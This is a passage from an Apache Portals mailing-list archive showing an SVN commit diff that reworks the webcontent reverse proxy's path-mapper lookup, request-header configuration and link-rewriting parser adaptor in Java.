Collections.synchronizedMap(new HashMap<HttpReverseProxyPathMapper, Pattern>()); + } + + public void setMaxMatchingPathPartCount(int maxMatchingPathPartCount) + { + this.maxMatchingPathPartCount = maxMatchingPathPartCount; + } + + public int getMaxMatchingPathPartCount() + { + return maxMatchingPathPartCount; } public HttpReverseProxyPathMapper findMapper(String pathInfo) { - int mapperCount = proxyPathMappers.size(); + String [] pathParts = StringUtils.split(pathInfo, "/", maxMatchingPathPartCount + 1); + int pathPartCount = (pathParts != null ? pathParts.length : 0); - for (int i = 0; i < mapperCount; i++) + if (pathPartCount == 0) { - HttpReverseProxyPathMapper proxyPathMapper = proxyPathMappers.get(i); + return null; + } + + for (int i = Math.min(pathPartCount, maxMatchingPathPartCount); i > 0; i--) + { + String localBasePathKey = "/" + StringUtils.join(pathParts, "/", 0, i); + HttpReverseProxyPathMapper proxyPathMapper = staticProxyPathMappersMap.get(localBasePathKey); - if (StringUtils.startsWith(pathInfo, proxyPathMapper.getLocalBasePath())) + if (proxyPathMapper == null) + { + proxyPathMapper = (HttpReverseProxyPathMapper) dynamicProxyPathMappersMap.get(localBasePathKey); + } + + if (proxyPathMapper != null) { return proxyPathMapper; } @@ -122,74 +195,52 @@ if (pattern == null) { - try + continue; + } + + Matcher matcher = pattern.matcher(pathInfo); + + if (matcher.lookingAt()) + { + int groupCount = matcher.groupCount(); + String [] replaces = new String[groupCount]; + String [] searches = new String[groupCount]; + + for (int i = 0; i < groupCount; i++) { - pattern = Pattern.compile(StringUtils.replaceEach(proxyPathMapper.getLocalBasePath(), GLOB_EXPR_SEARCHES, GLOB_EXPR_REPLACES)); + replaces[i] = matcher.group(i + 1); + searches[i] = "$" + (i + 1); } - catch (Exception e) + + //HttpReverseProxyPathMapper cloned = (HttpReverseProxyPathMapper) proxyPathMapper.clone(); + String localBasePath = matcher.group(0); + String remoteBaseURL = StringUtils.replaceEach(proxyPathMapper.getRemoteBaseURL(), searches, replaces); + HttpReverseProxyPathMapper derivedMapper = + new DefaultHttpReverseProxyPathMapperImpl(proxyPathMapper.getName() + ":" + localBasePath, + localBasePath, + remoteBaseURL, + proxyPathMapper.getDefaultRequestHeaders()); + + RewriterController rewriterController = rewriterControllerMap.get(proxyPathMapper); + Ruleset rewriterRules = rewriterRulesetMap.get(proxyPathMapper); + + if (rewriterController != null) { - if (log.isDebugEnabled()) - { - log.error("Failed to create regular expression pattern. Blacklisted: " + proxyPathMapper.getLocalBasePath(), e); - } - else - { - log.error("Failed to create regular expression pattern. Blacklisted: {}. {}", proxyPathMapper.getLocalBasePath(), e); - } + rewriterControllerMap.put(derivedMapper, rewriterController); } - if (pattern != null) + if (rewriterRules != null) { - localBasePathGlobPatternMap.put(proxyPathMapper, pattern); + rewriterRulesetMap.put(derivedMapper, rewriterRules); } - } - - if (pattern != null) - { - Matcher matcher = pattern.matcher(pathInfo); - if (matcher.lookingAt()) + synchronized (dynamicProxyPathMappersMap) { - int groupCount = matcher.groupCount(); - String [] replaces = new String[groupCount]; - String [] searches = new String[groupCount]; - - for (int i = 0; i < groupCount; i++) - { - replaces[i] = matcher.group(i + 1); - searches[i] = "$" + (i + 1); - } - - //HttpReverseProxyPathMapper cloned = (HttpReverseProxyPathMapper) proxyPathMapper.clone(); - String localBasePath = matcher.group(0); - HttpReverseProxyPathMapper derivedMapper = - new DefaultHttpReverseProxyPathMapperImpl(proxyPathMapper.getName() + ":" + localBasePath, - localBasePath, - StringUtils.replaceEach(proxyPathMapper.getRemoteBaseURL(), searches, replaces)); - - RewriterController rewriterController = rewriterControllerMap.get(proxyPathMapper); - Ruleset rewriterRules = rewriterRulesetMap.get(proxyPathMapper); - - if (rewriterController != null) - { - rewriterControllerMap.put(derivedMapper, rewriterController); - } - - if (rewriterRules != null) - { - rewriterRulesetMap.put(derivedMapper, rewriterRules); - } - - synchronized (proxyPathMappers) - { - if (!proxyPathMappers.contains(derivedMapper)) - { - proxyPathMappers.add(derivedMapper); - } - } - - return derivedMapper; + dynamicProxyPathMappersMap.put(StringUtils.removeEnd(localBasePath, "/"), derivedMapper); + dynamicProxyPathMappersMap.put(StringUtils.removeEnd(remoteBaseURL, "/"), derivedMapper); } + + return derivedMapper; } } } @@ -199,18 +250,27 @@ public HttpReverseProxyPathMapper findMapperByRemoteURL(String remoteURL) { - if (remoteURL == null) + String [] pathParts = StringUtils.split(remoteURL, "/", maxMatchingPathPartCount + 2); + int pathPartCount = (pathParts != null ? pathParts.length : 0); + + if (pathPartCount < 2) { return null; } - - int mapperCount = proxyPathMappers.size(); - - for (int i = 0; i < mapperCount; i++) + + String scheme = pathParts[0]; + + for (int i = Math.min(pathPartCount, maxMatchingPathPartCount + 1); i > 1; i--) { - HttpReverseProxyPathMapper proxyPathMapper = proxyPathMappers.get(i); + String remoteBaseURLKey = scheme + "//" + StringUtils.join(pathParts, "/", 1, i); + HttpReverseProxyPathMapper proxyPathMapper = (HttpReverseProxyPathMapper) staticProxyPathMappersMap.get(remoteBaseURLKey); - if (StringUtils.startsWith(remoteURL, proxyPathMapper.getRemoteBaseURL())) + if (proxyPathMapper == null) + { + proxyPathMapper = (HttpReverseProxyPathMapper) dynamicProxyPathMappersMap.get(remoteBaseURLKey); + } + + if (proxyPathMapper != null) { return proxyPathMapper; } @@ -224,83 +284,58 @@ if (pattern == null) { - try + continue; + } + + Matcher matcher = pattern.matcher(remoteURL); + + if (matcher.lookingAt()) + { + int groupCount = matcher.groupCount(); + String [] replaces = new String[groupCount]; + String [] searches = new String[groupCount]; + + for (int i = 0; i < groupCount; i++) + { + replaces[i] = matcher.group(i + 1); + searches[i] = "$" + (i + 1); + } + + String remoteBaseURL = matcher.group(0); + String localBasePath = proxyPathMapper.getLocalBasePath(); + + for (int i = 1; StringUtils.contains(localBasePath, '*'); i++) { - String expr = StringUtils.replaceEach(proxyPathMapper.getRemoteBaseURL(), GLOB_EXPR_SEARCHES, GLOB_EXPR_REPLACES); - expr = StringUtils.replaceEach(expr, GROUP_REF_SEARCHES, GROUP_REF_REPLACES); - pattern = Pattern.compile(expr); + localBasePath = StringUtils.replaceOnce(localBasePath, "*", "$" + i); } - catch (Exception e) + + localBasePath = StringUtils.replaceEach(localBasePath, searches, replaces); + HttpReverseProxyPathMapper derivedMapper = + new DefaultHttpReverseProxyPathMapperImpl(proxyPathMapper.getName() + ":" + localBasePath, + localBasePath, + remoteBaseURL, + proxyPathMapper.getDefaultRequestHeaders()); + + RewriterController rewriterController = rewriterControllerMap.get(proxyPathMapper); + Ruleset rewriterRules = rewriterRulesetMap.get(proxyPathMapper); + + if (rewriterController != null) { - if (log.isDebugEnabled()) - { - log.error("Failed to create regular expression pattern: " + proxyPathMapper.getRemoteBaseURL(), e); - } - else - { - log.error("Failed to create regular expression pattern: {}. {}", proxyPathMapper.getRemoteBaseURL(), e); - } + rewriterControllerMap.put(derivedMapper, rewriterController); } - if (pattern != null) + if (rewriterRules != null) { - remoteBaseURLGlobPatternMap.put(proxyPathMapper, pattern); + rewriterRulesetMap.put(derivedMapper, rewriterRules); } - } - - if (pattern != null) - { - Matcher matcher = pattern.matcher(remoteURL); - if (matcher.lookingAt()) + synchronized (dynamicProxyPathMappersMap) { - int groupCount = matcher.groupCount(); - String [] replaces = new String[groupCount]; - String [] searches = new String[groupCount]; - - for (int i = 0; i < groupCount; i++) - { - replaces[i] = matcher.group(i + 1); - searches[i] = "$" + (i + 1); - } - - String remoteBaseURL = matcher.group(0); - String localBasePath = proxyPathMapper.getLocalBasePath(); - - for (int i = 1; StringUtils.contains(localBasePath, '*'); i++) - { - localBasePath = StringUtils.replaceOnce(localBasePath, "*", "$" + i); - } - - localBasePath = StringUtils.replaceEach(localBasePath, searches, replaces); - HttpReverseProxyPathMapper derivedMapper = - new DefaultHttpReverseProxyPathMapperImpl(proxyPathMapper.getName() + ":" + localBasePath, - localBasePath, - remoteBaseURL); - - RewriterController rewriterController = rewriterControllerMap.get(proxyPathMapper); - Ruleset rewriterRules = rewriterRulesetMap.get(proxyPathMapper); - - if (rewriterController != null) - { - rewriterControllerMap.put(derivedMapper, rewriterController); - } - - if (rewriterRules != null) - { - rewriterRulesetMap.put(derivedMapper, rewriterRules); - } - - synchronized (proxyPathMappers) - { - if (!proxyPathMappers.contains(derivedMapper)) - { - proxyPathMappers.add(derivedMapper); - } - } - - return derivedMapper; + dynamicProxyPathMappersMap.put(StringUtils.removeEnd(localBasePath, "/"), derivedMapper); + dynamicProxyPathMappersMap.put(StringUtils.removeEnd(remoteBaseURL, "/"), derivedMapper); } + + return derivedMapper; } } } @@ -318,9 +353,4 @@ return rewriterRulesetMap.get(proxyPathMapper); } - public List<HttpReverseProxyPathMapper> getProxyPathMappers() - { - return Collections.unmodifiableList(proxyPathMappers); - } - } Modified: portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/DefaultHttpReverseProxyServlet.java URL: http://svn.apache.org/viewvc/portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/DefaultHttpReverseProxyServlet.java?rev=821934&r1=821933&r2=821934&view=diff ============================================================================== --- portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/DefaultHttpReverseProxyServlet.java (original) +++ portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/DefaultHttpReverseProxyServlet.java Mon Oct 5 17:50:07 2009 @@ -59,6 +59,8 @@ import org.apache.http.conn.routing.RouteInfo; import org.apache.http.params.BasicHttpParams; import org.apache.http.params.HttpParams; +import org.apache.portals.applications.webcontent.proxy.HttpReverseProxyException; +import org.apache.portals.applications.webcontent.proxy.HttpReverseProxyNotFoundException; import org.apache.portals.applications.webcontent.proxy.HttpReverseProxyPathMapper; import org.apache.portals.applications.webcontent.proxy.HttpReverseProxyPathMapperProvider; import org.apache.portals.applications.webcontent.proxy.HttpReverseProxyService; @@ -166,12 +168,26 @@ if (StringUtils.isBlank(localBasePath) || StringUtils.isBlank(remoteBaseURL)) { log.error("Wrong configuration for pass mapping of " + pathName + ". local={}, remove={}.", localBasePath, remoteBaseURL); + continue; } try { + Map<String, String> defaultRequestHeaders = null; + Configuration defaultRequestHeadersConf = pathPassConf.subset("request.header"); + if (!defaultRequestHeadersConf.isEmpty()) + { + defaultRequestHeaders = new HashMap<String, String>(); + + for (Iterator it = defaultRequestHeadersConf.getKeys(); it.hasNext(); ) + { + String key = (String) it.next(); + defaultRequestHeaders.put(key, defaultRequestHeadersConf.getString(key)); + } + } + HttpReverseProxyPathMapper proxyPathMapper = - new DefaultHttpReverseProxyPathMapperImpl(pathName, localBasePath, remoteBaseURL); + new DefaultHttpReverseProxyPathMapperImpl(pathName, localBasePath, remoteBaseURL, defaultRequestHeaders); proxyPathMappers.add(proxyPathMapper); Configuration rewritersConf = pathPassConf.subset("rewriter"); @@ -207,8 +223,30 @@ } } - HttpReverseProxyPathMapperProvider proxyPathMapperProvider = - new DefaultHttpReverseProxyPathMapperProviderImpl(proxyPathMappers, rewriterControllerMap, rewriterRulesetMap); + int dynamicProxyPathMapperCacheCount = 1000; + try + { + dynamicProxyPathMapperCacheCount = passConf.getInt("dynamicProxyPathMapperCacheCount", dynamicProxyPathMapperCacheCount); + } + catch (Exception ignore) + { + } + + int maxMatchingPathPartCount = 2; + try + { + maxMatchingPathPartCount = passConf.getInt("maxMatchingPathPartCount", maxMatchingPathPartCount); + } + catch (Exception ignore) + { + } + + DefaultHttpReverseProxyPathMapperProviderImpl proxyPathMapperProvider = + new DefaultHttpReverseProxyPathMapperProviderImpl(proxyPathMappers, dynamicProxyPathMapperCacheCount, + rewriterControllerMap, rewriterRulesetMap); + + proxyPathMapperProvider.setMaxMatchingPathPartCount(maxMatchingPathPartCount); + HttpReverseProxyService tempProxyService = new RewritableHttpReverseProxyServiceImpl(proxyPathMapperProvider); Configuration serverConf = configuration.subset("proxy.server"); @@ -319,6 +357,14 @@ { proxyService.invoke(request, response); } + catch (HttpReverseProxyNotFoundException e) + { + response.sendError(404, e.getLocalizedMessage()); + } + catch (HttpReverseProxyException e) + { + throw new ServletException(e); + } finally { try @@ -339,6 +385,9 @@ Class basicRewriterClass = null; Class ruleBasedRewriterClass = null; Map<String, Class> adaptorMimeTypeClassMap = new HashMap<String, Class>(); + Map<String, Object> basicRewriterProps = null; + Map<String, Object> rulesetRewriterProps = null; + Map<String, Map<String, Object>> parserAdaptorMimeTypeMap = null; try { @@ -349,22 +398,43 @@ ruleMappingsFilePath = getServletContext().getRealPath(ruleMappings); } - String basicRewriter = rewriterConf.getString("basic"); + Configuration basicRewriterConf = rewriterConf.subset("basic"); + String basicRewriter = basicRewriterConf.getString(""); if (!StringUtils.isBlank(basicRewriter)) { basicRewriterClass = Thread.currentThread().getContextClassLoader().loadClass(basicRewriter); + Configuration propsConf = basicRewriterConf.subset("property"); + if (!propsConf.isEmpty()) + { + basicRewriterProps = new HashMap<String, Object>(); + for (Iterator it = propsConf.getKeys(); it.hasNext(); ) + { + String propName = (String) it.next(); + basicRewriterProps.put(propName, propsConf.getString(propName)); + } + } } - String ruleBasedRewriter = rewriterConf.getString("rulebased"); + Configuration ruleBasedRewriterConf = rewriterConf.subset("rulebased"); + String ruleBasedRewriter = ruleBasedRewriterConf.getString(""); if (!StringUtils.isBlank(ruleBasedRewriter)) { ruleBasedRewriterClass = Thread.currentThread().getContextClassLoader().loadClass(ruleBasedRewriter); + Configuration propsConf = ruleBasedRewriterConf.subset("property"); + if (!propsConf.isEmpty()) + { + rulesetRewriterProps = new HashMap<String, Object>(); + for (Iterator it = propsConf.getKeys(); it.hasNext(); ) + { + String propName = (String) it.next(); + rulesetRewriterProps.put(propName, propsConf.getString(propName)); + } + } } Configuration parserAdaptorsConf = rewriterConf.subset("parserAdaptor"); - String [] parserAdaptorNames = parserAdaptorsConf.getStringArray(""); if (!ArrayUtils.isEmpty(parserAdaptorNames)) @@ -378,14 +448,35 @@ if (!StringUtils.isBlank(parserAdaptor)) { Class parserAdaptorClass = Thread.currentThread().getContextClassLoader().loadClass(parserAdaptor); + Configuration propsConf = parserAdaptorConf.subset("property"); + if (!propsConf.isEmpty()) + { + Map<String, Object> parserAdaptorProps = new HashMap<String, Object>(); + for (Iterator it = propsConf.getKeys(); it.hasNext(); ) + { + String propName = (String) it.next(); + parserAdaptorProps.put(propName, propsConf.getString(propName)); + } + if (parserAdaptorMimeTypeMap == null) + { + parserAdaptorMimeTypeMap = new HashMap<String, Map<String, Object>>(); + } + parserAdaptorMimeTypeMap.put(mimeType, parserAdaptorProps); + } adaptorMimeTypeClassMap.put(mimeType, parserAdaptorClass); } } } - return new MappingRewriterController(ruleMappingsFilePath, - basicRewriterClass, ruleBasedRewriterClass, - adaptorMimeTypeClassMap); + MappingRewriterController rewriterController = new MappingRewriterController(ruleMappingsFilePath, + basicRewriterClass, ruleBasedRewriterClass, + adaptorMimeTypeClassMap); + + rewriterController.setBasicRewriterProps(basicRewriterProps); + rewriterController.setRulesetRewriterProps(basicRewriterProps); + rewriterController.setParserAdaptorMimeTypePropsMap(parserAdaptorMimeTypeMap); + + return rewriterController; } catch (Exception e) { Copied: portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/DefaultReverseProxyLinkRewritingParserAaptor.java (from r821705, portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/PassMappingLinkRewritingParserAaptor.java) URL: http://svn.apache.org/viewvc/portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/DefaultReverseProxyLinkRewritingParserAaptor.java?p2=portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/DefaultReverseProxyLinkRewritingParserAaptor.java&p1=portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/PassMappingLinkRewritingParserAaptor.java&r1=821705&r2=821934&rev=821934&view=diff ============================================================================== --- portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/PassMappingLinkRewritingParserAaptor.java (original) +++ portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/DefaultReverseProxyLinkRewritingParserAaptor.java Mon Oct 5 17:50:07 2009 @@ -16,32 +16,16 @@ */ package org.apache.portals.applications.webcontent.proxy.impl; -import java.io.BufferedWriter; -import java.io.PrintWriter; -import java.io.Reader; -import java.io.Writer; -import java.util.ArrayList; +import java.util.HashMap; import java.util.HashSet; -import java.util.List; +import java.util.Map; import java.util.Set; import java.util.regex.Matcher; import java.util.regex.Pattern; -import org.apache.commons.collections.KeyValue; -import org.apache.commons.collections.keyvalue.DefaultKeyValue; -import org.apache.commons.io.IOUtils; -import org.apache.commons.io.LineIterator; import org.apache.commons.lang.StringUtils; import org.apache.portals.applications.webcontent.proxy.HttpReverseProxyPathMapper; -import org.apache.portals.applications.webcontent.proxy.HttpReverseProxyPathMapperProvider; -import org.apache.portals.applications.webcontent.proxy.ReverseProxyRewritingContext; -import org.apache.portals.applications.webcontent.proxy.ReverseProxyRewritingContextAware; -import org.apache.portals.applications.webcontent.rewriter.ParserAdaptor; -import org.apache.portals.applications.webcontent.rewriter.Rewriter; -import org.apache.portals.applications.webcontent.rewriter.RewriterException; import org.apache.portals.applications.webcontent.util.CharArraySegment; -import org.slf4j.Logger; -import org.slf4j.LoggerFactory; /** * A simple reverse proxy link rewriting parser adaptor implementation. @@ -51,39 +35,39 @@ * * @version $Id$ */ -public class PassMappingLinkRewritingParserAaptor implements ParserAdaptor, ReverseProxyRewritingContextAware +public class DefaultReverseProxyLinkRewritingParserAaptor extends AbstractReverseProxyTextLinesParserAdaptor { protected static final Pattern LINK_ABS_PATH_PATTERN = Pattern.compile("(\\s|^)(href|src|action)\\s*=\\s*(['\"])((\\/)[^'\"]*)['\"]", Pattern.CASE_INSENSITIVE); protected static final Pattern LINK_HTTP_ABS_URL_PATTERN = - Pattern.compile("(\\s|^)(href|src|action)\\s*=\\s*['\"](https?:\\/\\/[^\\/'\"]+)[^'\"]*['\"]", Pattern.CASE_INSENSITIVE); + Pattern.compile("(\\s|^)(href|src|action)\\s*=\\s*['\"](https?:\\/\\/[^'\"]+)['\"]", Pattern.CASE_INSENSITIVE); protected static final Pattern HTTP_DOMAIN_ADDRESS_ONLY_PATTERN = Pattern.compile("^https?:\\/\\/[^\\/]+$", Pattern.CASE_INSENSITIVE); - private static Logger log = LoggerFactory.getLogger(PassMappingLinkRewritingParserAaptor.class); - protected boolean lookUpAllMappings; - protected ReverseProxyRewritingContext reverseProxyRewritingContext; + protected String localPathMatchingReplaces; protected String [] linkRemoteBaseURLSearches = { "/", "." }; protected String [] linkRemoteBaseURLReplaces = { "\\/", "\\." }; - private List<HttpReverseProxyPathMapper> proxyPathMappers; - private List<KeyValue> remoteURLPatternReplacesPairs; - private KeyValue myURLPatternReplacesPair; + private Pattern defaultRemoteURLPattern; + private String defaultRemoteURLReplaces; private Set<String> blacklist; - public PassMappingLinkRewritingParserAaptor() + private Map<HttpReverseProxyPathMapper, Pattern> remoteURLMatchingPatternMap; + private Map<HttpReverseProxyPathMapper, String> localPathMatchingReplacesMap; + + public DefaultReverseProxyLinkRewritingParserAaptor() { this(true, null); } - public PassMappingLinkRewritingParserAaptor(boolean lookUpAllMappings, Set<String> blacklist) + public DefaultReverseProxyLinkRewritingParserAaptor(boolean lookUpAllMappings, Set<String> blacklist) { setLookUpAllMappings(lookUpAllMappings); setBlacklist(blacklist); @@ -99,151 +83,110 @@ this.blacklist = blacklist; } - public void setReverseProxyRewritingContext(ReverseProxyRewritingContext reverseProxyRewritingContext) + @Override + protected String rewriteLine(String line) throws Exception { - this.reverseProxyRewritingContext = reverseProxyRewritingContext; - } - - public void rewrite(Rewriter rewriter, Reader reader, Writer writer) throws RewriterException - { - HttpReverseProxyPathMapperProvider proxyPathMapperProvider = reverseProxyRewritingContext.getHttpReverseProxyPathMapperProvider(); - String myLocalPathMatchingReplaces = createLocalPathMatchingReplaces(reverseProxyRewritingContext.getHttpReverseProxyPathMapper()); - - if (lookUpAllMappings && blacklist == null) + if (defaultRemoteURLPattern == null) { - blacklist = new HashSet<String>(); + defaultRemoteURLPattern = createRemoteURLMatchingPattern(getHttpReverseProxyPathMapper()); + defaultRemoteURLReplaces = createLocalPathMatchingReplaces(getHttpReverseProxyPathMapper()); } - PrintWriter out = new PrintWriter(new BufferedWriter(writer)); + // first, replace slash leading relative paths by slash leading reverse proxying relative paths. + Matcher linkBasePathMatcher = LINK_ABS_PATH_PATTERN.matcher(line); + line = linkBasePathMatcher.replaceAll("$1$2=$3" + defaultRemoteURLReplaces + "$4$3"); - for (LineIterator lineIt = IOUtils.lineIterator(reader); lineIt.hasNext(); ) + // if there's any https? absolute url link, try to find the proxy path mapper again... + if (lookUpAllMappings) { - String line = lineIt.nextLine(); - String tempLine = line; + CharSequence segment = new CharArraySegment(line); - if (!StringUtils.isBlank(line)) + for (Matcher absURLMatcher = LINK_HTTP_ABS_URL_PATTERN.matcher(segment); absURLMatcher.find(); ) { - try + HttpReverseProxyPathMapper proxyMapper = null; + String absURL = absURLMatcher.group(3); + int maxMatchingPathPartCount = getMaxMatchingPathPartCount(); + String [] pathParts = StringUtils.split(absURL, "/", maxMatchingPathPartCount + 2); + int pathPartCount = (pathParts != null ? pathParts.length : 0); + + if (pathPartCount < 2) { - // first, replace slash leading relative paths by slash leading reverse proxying relative paths. - Matcher linkBasePathMatcher = LINK_ABS_PATH_PATTERN.matcher(tempLine); - tempLine = linkBasePathMatcher.replaceAll("$1$2=$3" + myLocalPathMatchingReplaces + "$4$3"); + continue; + } + + String scheme = pathParts[0]; + + for (int i = Math.min(pathPartCount, maxMatchingPathPartCount + 1); i > 1; i--) + { + String remoteBaseURLKey = scheme + "//" + StringUtils.join(pathParts, "/", 1, i); + + if (blacklist != null && blacklist.contains(remoteBaseURLKey)) + { + continue; + } + + proxyMapper = getHttpReverseProxyPathMapperProvider().findMapperByRemoteURL(remoteBaseURLKey + "/"); - // second, replace absolute urls by slash leading relative paths. - if (lookUpAllMappings) + if (proxyMapper == null) { - for (KeyValue pair : getRemoteURLPatternReplacesPairs()) + if (blacklist == null) { - Matcher matcher = ((Pattern) pair.getKey()).matcher(tempLine); - tempLine = replaceRemoteLinkValues(matcher, "$1$2=$3" + ((String) pair.getValue()) + "$6$3", tempLine); + blacklist = new HashSet<String>(); } - // if there's any https? absolute url link, try to find the proxy path mapper again... + blacklist.add(remoteBaseURLKey); + } + else + { + if (remoteURLMatchingPatternMap == null) + { + remoteURLMatchingPatternMap = new HashMap<HttpReverseProxyPathMapper, Pattern>(); + localPathMatchingReplacesMap = new HashMap<HttpReverseProxyPathMapper, String>(); + } - CharSequence segment = new CharArraySegment(tempLine); + Pattern pattern = remoteURLMatchingPatternMap.get(proxyMapper); + if (pattern == null) + { + pattern = createRemoteURLMatchingPattern(proxyMapper); + remoteURLMatchingPatternMap.put(proxyMapper, pattern); + } - for (Matcher absURLMatcher = LINK_HTTP_ABS_URL_PATTERN.matcher(segment); absURLMatcher.find(); ) + String localPathMatchingReplaces = localPathMatchingReplacesMap.get(proxyMapper); + if (localPathMatchingReplaces == null) { - String domainURL = absURLMatcher.group(3); - - if (blacklist.contains(domainURL)) - { - continue; - } - - HttpReverseProxyPathMapper proxyMapper = proxyPathMapperProvider.findMapperByRemoteURL(domainURL + "/"); - - if (proxyMapper == null) - { - blacklist.add(domainURL); - } - else - { - if (!proxyPathMappers.contains(proxyMapper)) - { - KeyValue pair = new DefaultKeyValue(createRemoteURLMatchingPattern(proxyMapper), - createLocalPathMatchingReplaces(proxyMapper)); - - Matcher matcher = ((Pattern) pair.getKey()).matcher(tempLine); - tempLine = replaceRemoteLinkValues(matcher, "$1$2=$3" + ((String) pair.getValue()) + "$6$3", tempLine); - - remoteURLPatternReplacesPairs.add(pair); - proxyPathMappers.add(proxyMapper); - } - } - - segment = segment.subSequence(absURLMatcher.end(), segment.length()); - absURLMatcher.reset(segment); + localPathMatchingReplaces = createLocalPathMatchingReplaces(proxyMapper); + localPathMatchingReplacesMap.put(proxyMapper, localPathMatchingReplaces); } + + Matcher matcher = pattern.matcher(line); + line = replaceRemoteLinkValues(matcher, "$1$2=$3" + localPathMatchingReplaces + "$6$3", line); + + break; } - else - { - KeyValue pair = getMyURLPatternReplacesPair(); - Matcher matcher = ((Pattern) pair.getKey()).matcher(tempLine); - tempLine = matcher.replaceAll("$1$2=$3" + ((String) pair.getValue()) + "$6$3"); - } - - line = tempLine; - } - catch (Exception e) - { - log.warn("Error during {}: {}", "replacement", e); } + + segment = segment.subSequence(absURLMatcher.end(), segment.length()); + absURLMatcher.reset(segment); } - - out.println(line); + } + else + { + Matcher matcher = defaultRemoteURLPattern.matcher(line); + line = matcher.replaceAll("$1$2=$3" + defaultRemoteURLReplaces + "$6$3"); } - out.flush(); + return line; } protected Pattern createRemoteURLMatchingPattern(HttpReverseProxyPathMapper proxyMapper) { - Pattern pattern = null; - String remoteBaseURLPattern = null; - - log.info("remoteBaseURL: {}", proxyMapper.getRemoteBaseURL()); - log.info("replaced: {}", StringUtils.replaceEach(StringUtils.removeEnd(proxyMapper.getRemoteBaseURL(), "/"), linkRemoteBaseURLSearches, linkRemoteBaseURLReplaces)); - - remoteBaseURLPattern = StringUtils.replaceEach(StringUtils.removeEnd(proxyMapper.getRemoteBaseURL(), "/"), linkRemoteBaseURLSearches, linkRemoteBaseURLReplaces); - pattern = Pattern.compile("(\\s|^)(href|src|action)\\s*=\\s*(['\"])((" + remoteBaseURLPattern + ")([^'\"]*))['\"]", Pattern.CASE_INSENSITIVE); - - return pattern; + String remoteBaseURLPattern = StringUtils.replaceEach(StringUtils.removeEnd(proxyMapper.getRemoteBaseURL(), "/"), linkRemoteBaseURLSearches, linkRemoteBaseURLReplaces); + return Pattern.compile("(\\s|^)(href|src|action)\\s*=\\s*(['\"])((" + remoteBaseURLPattern + ")([^'\"]*))['\"]", Pattern.CASE_INSENSITIVE); } protected String createLocalPathMatchingReplaces(HttpReverseProxyPathMapper proxyMapper) { - return reverseProxyRewritingContext.getRewritingContextPath() + StringUtils.removeEnd(proxyMapper.getLocalBasePath(), "/"); - } - - protected List<KeyValue> getRemoteURLPatternReplacesPairs() - { - if (remoteURLPatternReplacesPairs == null) - { - HttpReverseProxyPathMapperProvider mapperProvider = reverseProxyRewritingContext.getHttpReverseProxyPathMapperProvider(); - proxyPathMappers = new ArrayList<HttpReverseProxyPathMapper>(mapperProvider.getProxyPathMappers()); - int proxyMappersCount = proxyPathMappers.size(); - remoteURLPatternReplacesPairs = new ArrayList<KeyValue>(); - - for (HttpReverseProxyPathMapper proxyMapper : proxyPathMappers) - { - remoteURLPatternReplacesPairs.add(new DefaultKeyValue(createRemoteURLMatchingPattern(proxyMapper), - createLocalPathMatchingReplaces(proxyMapper))); - } - } - - return remoteURLPatternReplacesPairs; - } - - protected KeyValue getMyURLPatternReplacesPair() - { - if (myURLPatternReplacesPair == null) - { - HttpReverseProxyPathMapper proxyMapper = reverseProxyRewritingContext.getHttpReverseProxyPathMapper(); - myURLPatternReplacesPair = new DefaultKeyValue(createRemoteURLMatchingPattern(proxyMapper), createLocalPathMatchingReplaces(proxyMapper)); - } - - return myURLPatternReplacesPair; + return getRewritingContextPath() + StringUtils.removeEnd(proxyMapper.getLocalBasePath(), "/"); } protected String replaceRemoteLinkValues(Matcher matcher, String replacement, String text) @@ -282,9 +225,4 @@ return text; } - public void parse(Rewriter rewriter, Reader reader) throws RewriterException - { - throw new UnsupportedOperationException(); - } - } Propchange: portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/DefaultReverseProxyLinkRewritingParserAaptor.java ------------------------------------------------------------------------------ svn:eol-style = native Propchange: portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/DefaultReverseProxyLinkRewritingParserAaptor.java ------------------------------------------------------------------------------ svn:keywords = Id Propchange: portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/DefaultReverseProxyLinkRewritingParserAaptor.java ------------------------------------------------------------------------------ svn:mime-type = text/plain From [email protected] Tue Oct 06 10:06:59 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 42782 invoked from network); 6 Oct 2009 10:06:59 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 6 Oct 2009 10:06:59 -0000 Received: (qmail 12444 invoked by uid 500); 6 Oct 2009 10:06:59 -0000 Delivered-To: [email protected] Received: (qmail 12412 invoked by uid 500); 6 Oct 2009 10:06:59 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <portalapps-dev.portals.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 12402 invoked by uid 99); 6 Oct 2009 10:06:59 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 06 Oct 2009 10:06:59 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 06 Oct 2009 10:06:48 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 